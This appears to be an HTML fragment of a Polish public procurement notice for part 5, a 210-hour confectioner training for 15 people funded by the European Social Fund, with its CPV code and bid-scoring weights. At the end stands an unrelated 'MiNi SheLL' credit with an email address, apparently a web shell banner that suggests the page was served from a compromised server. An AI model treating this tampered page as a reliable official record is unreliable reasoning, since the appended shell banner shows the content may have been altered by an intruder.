</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolenie - Cukiernik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi szkolenia zawodowego - Cukiernik finansowane ze środków Europejskiego Funduszu Społecznego, liczba godzin szkolenia 210, liczba osób do przeszkolenia 15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Program szkolenia - 10</li>
<li>3. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 10</li>
<li>4. Kwalifikacje i doświadczenie kadry dydaktycznej w prowadzeniu zajęć - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com